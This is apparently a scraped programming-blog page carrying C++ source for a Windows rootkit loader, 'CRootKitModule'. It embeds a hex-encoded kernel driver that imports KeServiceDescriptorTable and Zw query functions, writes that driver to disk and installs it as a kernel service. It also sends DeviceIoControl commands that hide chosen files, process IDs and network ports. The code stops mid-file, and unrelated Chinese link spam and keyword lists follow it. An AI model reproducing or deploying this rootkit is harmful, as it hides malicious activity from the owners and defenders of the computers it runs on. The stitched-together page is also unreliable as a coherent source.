"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x4e/xe6/x40/xbb/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/xa1/x00/x30/x01/x00/x85/xc0/xb9/x4e/xe6/x40/xbb/x74/x04/x3b/xc1"
"/x75/x19/xa1/x3c/x20/x01/x00/x8b/x00/x35/x00/x30/x01/x00/xa3/x00"
"/x30/x01/x00/x75/x06/x89/x0d/x00/x30/x01/x00/xe9/x82/xd1/xff/xff"
"/x58/x40/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x02/x42/x00/x00"
"/x00/x20/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x9c/x40/x00/x00/xb2/x40/x00/x00"
"/xc4/x40/x00/x00/xdc/x40/x00/x00/xf4/x40/x00/x00/x0c/x41/x00/x00"
"/x1e/x41/x00/x00/x32/x41/x00/x00/x46/x41/x00/x00/x58/x41/x00/x00"
"/x78/x41/x00/x00/x8c/x41/x00/x00/xa8/x41/x00/x00/xc0/x41/x00/x00"
"/xdc/x41/x00/x00/xf4/x41/x00/x00/x00/x00/x00/x00/xf1/x01/x49/x6f"
"/x66/x43/x6f/x6d/x70/x6c/x65/x74/x65/x52/x65/x71/x75/x65/x73/x74"
"/x00/x00/x5e/x01/x49/x6f/x44/x65/x6c/x65/x74/x65/x44/x65/x76/x69"
"/x63/x65/x00/x00/x60/x01/x49/x6f/x44/x65/x6c/x65/x74/x65/x53/x79"
"/x6d/x62/x6f/x6c/x69/x63/x4c/x69/x6e/x6b/x00/x00/x3b/x04/x52/x74"
"/x6c/x49/x6e/x69/x74/x55/x6e/x69/x63/x6f/x64/x65/x53/x74/x72/x69"
"/x6e/x67/x00/x00/x54/x01/x49/x6f/x43/x72/x65/x61/x74/x65/x53/x79"
"/x6d/x62/x6f/x6c/x69/x63/x4c/x69/x6e/x6b/x00/x00/x4b/x01/x49/x6f"
"/x43/x72/x65/x61/x74/x65/x44/x65/x76/x69/x63/x65/x00/x00/x1e/x04"
"/x52/x74/x6c/x46/x72/x65/x65/x41/x6e/x73/x69/x53/x74/x72/x69/x6e"
"/x67/x00/xd7/x03/x52/x74/x6c/x43/x6f/x6d/x70/x61/x72/x65/x4d/x65"
"/x6d/x6f/x72/x79/x00/x00/xc9/x04/x52/x74/x6c/x55/x70/x70/x65/x72"
"/x53/x74/x72/x69/x6e/x67/x00/x00/xb5/x04/x52/x74/x6c/x55/x6e/x69"
"/x63/x6f/x64/x65/x53/x74/x72/x69/x6e/x67/x54/x6f/x41/x6e/x73/x69"
"/x53/x74/x72/x69/x6e/x67/x00/x00/x37/x04/x52/x74/x6c/x49/x6e/x69"
"/x74/x41/x6e/x73/x69/x53/x74/x72/x69/x6e/x67/x00/x69/x02/x4b/x65"
"/x53/x65/x72/x76/x69/x63/x65/x44/x65/x73/x63/x72/x69/x70/x74/x6f"
"/x72/x54/x61/x62/x6c/x65/x00/x00/x65/x05/x5a/x77/x51/x75/x65/x72"
"/x79/x44/x69/x72/x65/x63/x74/x6f/x72/x79/x46/x69/x6c/x65/x00/x00"
"/x75/x05/x5a/x77/x51/x75/x65/x72/x79/x53/x79/x73/x74/x65/x6d/x49"
"/x6e/x66/x6f/x72/x6d/x61/x74/x69/x6f/x6e/x00/x00/x3b/x05/x5a/x77"
"/x44/x65/x76/x69/x63/x65/x49/x6f/x43/x6f/x6e/x74/x72/x6f/x6c/x46"
"/x69/x6c/x65/x00/x7f/x02/x4b/x65/x54/x69/x63/x6b/x43/x6f/x75/x6e"
"/x74/x00/x6e/x74/x6f/x73/x6b/x72/x6e/x6c/x2e/x65/x78/x65/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x10/x00/x00/xb0/x00/x00/x00/xa4/x30/xbc/x30/x19/x31/x23/x31"
"/x34/x31/x4d/x31/xd7/x31/xdc/x31/xfc/x31/x14/x32/x28/x32/x3c/x32"
"/x43/x32/x56/x32/x5d/x32/x98/x32/xa0/x32/xaa/x32/xef/x32/xf5/x32"
"/x1b/x33/x2c/x33/x4f/x33/x64/x33/xb4/x33/xd0/x33/xdc/x33/xe2/x33"
"/xef/x33/x04/x34/x0d/x34/x24/x34/x3c/x34/x41/x34/x4c/x34/x61/x34"
"/x73/x34/x84/x34/xc2/x34/xd1/x34/xda/x34/xed/x34/x0d/x35/x23/x35"
"/x4b/x35/x6a/x35/x97/x35/xc0/x35/xcc/x35/xd2/x35/xdf/x35/xf4/x35"
"/xfd/x35/x14/x36/x2c/x36/x31/x36/x3c/x36/x51/x36/x61/x36/x6f/x36"
"/x87/x36/x97/x36/xb0/x36/xe4/x36/x51/x37/x6c/x37/x03/x38/x1e/x38"
"/x8d/x38/x9b/x38/xb3/x38/xc3/x38/xdc/x38/xe8/x38/xf4/x38/xfa/x38"
"/x07/x39/x1c/x39/x25/x39/x3c/x39/x54/x39/x59/x39/x64/x39/x79/x39"
"/x00/x40/x00/x00/x14/x00/x00/x00/x01/x30/x13/x30/x1a/x30/x1f/x30"
"/x27/x30/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00";


CRootKitModule::~CRootKitModule(void)
{
   CloseServiceHandle(m_hSCManager);
}


bool CRootKitModule::InitInstance()
{
   m_hSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
   if(m_hSCManager == NULL)
       return false;
   m_strDriverName = L"";
   return true;
}

void CRootKitModule::Test()
{
   //..
}
BOOL CRootKitModule::InstallService(SC_HANDLE hSCManager, LPCTSTR ServiceName, LPCTSTR ServiceExe)
{
  SC_HANDLE schService;

  schService = CreateService( hSCManager,                 // SCManager database
                    ServiceName,         // name of service
                    ServiceName,         // name to display
                    SERVICE_ALL_ACCESS,     // desired access
                    SERVICE_KERNEL_DRIVER,   // service type
                    SERVICE_DEMAND_START,   // start type
                    SERVICE_ERROR_NORMAL,   // error control type
                    ServiceExe,         // service's binary
                    NULL,             // no load ordering group
                    NULL,             // no tag identifier
                    NULL,             // no dependencies
                    NULL,             // LocalSystem account
                    NULL               // no password
                    );
  if (schService == NULL)
   {
    return FALSE;
   }

  CloseServiceHandle(schService);
  return TRUE;
}


BOOL CRootKitModule::StartService(SC_HANDLE hSCManager, LPCTSTR ServiceName)
{
  SC_HANDLE schService = NULL;
  int     nRet = 0;
  
  schService = OpenService(hSCManager, ServiceName, SERVICE_ALL_ACCESS);
  if(schService == NULL)
   {
       if(GetLastError() == ERROR_SERVICE_DOES_NOT_EXIST)
       {
           return FALSE;
       }
    return FALSE;
   }

   nRet = ::StartService(schService, 0, NULL);
   if(!nRet)
   {
       if(GetLastError() == ERROR_SERVICE_ALREADY_RUNNING)
       {
           return nRet;
       }
   }

  CloseServiceHandle(schService);
  return nRet;
}

BOOL CRootKitModule::StopService(SC_HANDLE hSCManager, LPCTSTR ServiceName)
{
  SC_HANDLE     schService = NULL;
  SERVICE_STATUS ServiceStatus;
   int         nRet = 0;

  schService = OpenService(hSCManager, ServiceName, SERVICE_ALL_ACCESS);
  if(schService == NULL)
    return FALSE;

  nRet = ControlService(schService, SERVICE_CONTROL_STOP, &ServiceStatus);
   if(!nRet)
   {
       switch(GetLastError())
       {
       case ERROR_SERVICE_NOT_ACTIVE:
           return nRet;

       case ERROR_INVALID_SERVICE_CONTROL:
           return nRet;
       }
   }

  CloseServiceHandle(schService);
  return nRet;
}
BOOL CRootKitModule::RemoveService(SC_HANDLE hSCManager, LPCTSTR ServiceName)
{
  SC_HANDLE schService;
  int         nRet = 0;

  schService = OpenService(hSCManager, ServiceName, SERVICE_ALL_ACCESS);
  if(schService == NULL)
       return FALSE;

  nRet = DeleteService(schService);

  CloseServiceHandle(schService);

  return nRet;
}

HANDLE CRootKitModule::_CreateFile()
{
   return CreateFile(MY_DEVICE_NAME,GENERIC_READ | GENERIC_WRITE,0,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);
}

bool CRootKitModule::DeleteDriver(LPCTSTR szDriver )
{
   if( !szDriver)
   {
       StopService(m_hSCManager, szDriver);
       return !!RemoveService(m_hSCManager, szDriver);
   }
   StopService(m_hSCManager, ATL::CW2T(m_strDriverName.c_str()));
   return !!RemoveService(m_hSCManager, ATL::CW2T(m_strDriverName.c_str()));
  
  
}
bool CRootKitModule::CreateDriver(LPCSTR szFileName, LPCSTR szDriver)
{

   HANDLE hFile=CreateFile(szFileName,GENERIC_WRITE,FILE_SHARE_WRITE,NULL,Create_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL);
  DWORD dwBytes;
  WriteFile(hFile,g_szRootKitModule,sizeof(g_szRootKitModule) - 1,&dwBytes,NULL);
  CloseHandle(hFile);

   m_strDriverName = ATL::CT2W(szDriver);
   StopDriver();
   RemoveService(m_hSCManager, szDriver);
   if ( !InstallService(m_hSCManager, szDriver, szFileName) )
       return false;
   return true;
}

bool CRootKitModule::StartDriver()
{
   return !!StartService(m_hSCManager, ATL::CW2T(m_strDriverName.c_str()));
}
bool CRootKitModule::StopDriver()
{
   return !!StopService(m_hSCManager, ATL::CW2T(m_strDriverName.c_str()));
}
bool CRootKitModule::AddHideFile(LPCTSTR szFile)
{
   HANDLE hDevice = _CreateFile();
   if (hDevice==INVALID_HANDLE_VALUE)
       return false;
   char szInBuff[256];
   strcpy(szInBuff, ATL::CT2A(szFile));
   _strupr(szInBuff);
   DWORD dwBytesReturned;
   if (!(DeviceIoControl(hDevice,ZFJ_ROOTKIT_ADDHIDEFILE,szInBuff,(DWORD)strlen(szFile), szInBuff, 256, &dwBytesReturned,NULL)))
   {
   CloseHandle(hDevice);
   return FALSE;
   }
   CloseHandle(hDevice);
   return true;
}
bool CRootKitModule::DelHideFile(LPCTSTR szFile)
{
   HANDLE hDevice = _CreateFile();
   if (hDevice==INVALID_HANDLE_VALUE)
       return false;
   char szInBuff[256];
   strcpy(szInBuff, ATL::CT2A(szFile));
   _strupr(szInBuff);
   DWORD dwBytesReturned;
   if (!(DeviceIoControl(hDevice,ZFJ_ROOTKIT_DELHIDEFILE,szInBuff,(DWORD)strlen(szInBuff), szInBuff, 256, &dwBytesReturned,NULL)))
   {
   CloseHandle(hDevice);
   return FALSE;
   }
   CloseHandle(hDevice);
   return true;
}
bool CRootKitModule::StartHideFile()
{
   HANDLE hDevice = _CreateFile();
   if (hDevice==INVALID_HANDLE_VALUE)
       return false;
   char szInBuff[256] = "";
   DWORD dwBytesReturned;
   if (!(DeviceIoControl(hDevice,ZFJ_ROOTKIT_STARTHIDEFILE,szInBuff,(DWORD)strlen(szInBuff), szInBuff, 256, &dwBytesReturned,NULL)))
   {
   CloseHandle(hDevice);
   return FALSE;
   }
   CloseHandle(hDevice);
   return true;
}

bool CRootKitModule::AddHideProcessId(DWORD dwId)
{
   HANDLE hDevice = _CreateFile();
   if (hDevice==INVALID_HANDLE_VALUE)
       return false;
   char szInBuff[256] = "";
   memcpy(szInBuff, &dwId, sizeof(DWORD));
   DWORD dwBytesReturned;
   if (!(DeviceIoControl(hDevice,ZFJ_ROOTKIT_ADDHIDEPROCESS,szInBuff,(DWORD)strlen(szInBuff), szInBuff, 256, &dwBytesReturned,NULL)))
   {
   CloseHandle(hDevice);
   return FALSE;
   }
   CloseHandle(hDevice);
   return true;
}
bool CRootKitModule::DelHideProcessId(DWORD dwId)
{
   HANDLE hDevice = _CreateFile();
   if (hDevice==INVALID_HANDLE_VALUE)
       return false;
   char szInBuff[256] = "";
   memcpy(szInBuff, &dwId, sizeof(DWORD));
   DWORD dwBytesReturned;
   if (!(DeviceIoControl(hDevice,ZFJ_ROOTKIT_DELHIDEPROCESS,szInBuff,(DWORD)strlen(szInBuff), szInBuff, 256, &dwBytesReturned,NULL)))
   {
   CloseHandle(hDevice);
   return FALSE;
   }
   CloseHandle(hDevice);
   return true;
}
bool CRootKitModule::StartHideProcess()
{
   HANDLE hDevice = _CreateFile();
   if (hDevice==INVALID_HANDLE_VALUE)
       return false;
   char szInBuff[256] = "";
   DWORD dwBytesReturned;
   if (!(DeviceIoControl(hDevice,ZFJ_ROOTKIT_STARTHIDEPROCESS,szInBuff,(DWORD)strlen(szInBuff), szInBuff, 256, &dwBytesReturned,NULL)))
   {
   CloseHandle(hDevice);
   return FALSE;
   }
   CloseHandle(hDevice);
   return true;
}


bool CRootKitModule::AddHidePort(DWORD dwPort)
{
   HANDLE hDevice = _CreateFile();
   if (hDevice==INVALID_HANDLE_VALUE)
       return false;
   char szInBuff[256] = "";
   memcpy(szInBuff, &dwPort, sizeof(DWORD));
   DWORD dwBytesReturned;
   if (!(DeviceIoControl(hDevice,ZFJ_ROOTKIT_ADDHIDEPORT,szInBuff,(DWORD)strlen(szInBuff), szInBuff, 256, &dwBytesReturned,NULL)))
   {
   CloseHandle(hDevice);
   return FALSE;
   }
   CloseHandle(hDevice);
   return true;
}
bool CRootKitModule::DelHidePort(DWORD dwPort)
{
   HANDLE hDevice = _CreateFile();
   if (hDevice==INVALID_HANDLE_VALUE)
       return false;
   char szInBuff[256] = "";
   memcpy(szInBuff, &dwPort, sizeof(DWORD));
   DWORD dwBytesReturned;
   if (!(DeviceIoControl(hDevice,ZFJ_ROOTKIT_DELHIDEPORT,szInBuff,(DWORD)strlen(szInBuff), szInBuff, 256, &dwBytesReturned,NULL)))
   {
   CloseHandle(hDevice);
   return FALSE;
   }
   CloseHandle(hDevice);
   return true;
}
bool CRootKitModule::StartHidePort()
{
   HANDLE hDevice = _CreateFile();
   if (hDevice==INVALID_HANDLE_VALUE)
       return false;
   char szInBuff[256] = "";
   DWORD dwBytesReturned;
   if (!(DeviceIoControl(hDevice,ZFJ_ROOTKIT_STARTHIDEPORT,szInBuff,(DWORD)strlen(szInBuff), szInBuff, 256, &dwBytesReturned,NULL)))
   {
   CloseHandle(hDevice);
   return FALSE;
   }
   CloseHandle(hDevice);
   return true;
网络暴力案例 网络暴力案例
原创粉丝点击
热门IT博客
知止而后有定的意思知止而后有定的意思
stc和sst单片机的关系stc和sst单片机的关系
心智图软件
js 9mm冲锋枪
华为云计算培训学校
mac文件怎么转word
sechk是什么软件
百慕大三角电影知乎
正在检测目标单片机
人工智能对话app
java 多线程的书籍
仿美团外卖小程序源码
51单片机自学网
python 时间序列处理
xp如何连接网络打印机
网络语蜡烛什么意思
sql 不显示重复数据
软件企业认定申请表
fix it什么意思
python手册中文版下载
热门问题 老师的惩罚 人脸识别 我在镇武司摸鱼那些年 重生之率土为王 我在大康的咸鱼生活 盘龙之生命进化 天生仙种 凡人之先天五行 春回大明朝 姑娘不必设防,我是瞎子 自什么待什么成语 宽什么待什么成语 时什么什么待成语 待字成语 待什么什么什么成语大全 待开头的成语接龙 什么什么待言成语 亲不待前面是什么成语 以什么待什么的成语 待字开头的成语 形容迫不及待的成语 什么不什么待的成语 成语待什么什么沽 待的成语有哪些 什么叹成语 什么见成语 什么以待成语 然组成语 塌成语 则成语 什么位什么待成语 什么如此成语 什么什么然成语 什么不什么待成语 百态成语 什么什么什么待成语 待拼音 待弄拼音 待弄的拼音 待多音字组词和拼音 待组词和拼音 相等的拼音 睁开拼音 出入拼音 流字的拼音 充满的拼音 我已成影待你成王高清图 网王之静待彼岸花开时 展妍 待多音字组词 待的组词 待怎么组词

程序博客网,程序员的互联网技术博客家园。csdn论坛精品 msdn技术资料都在这里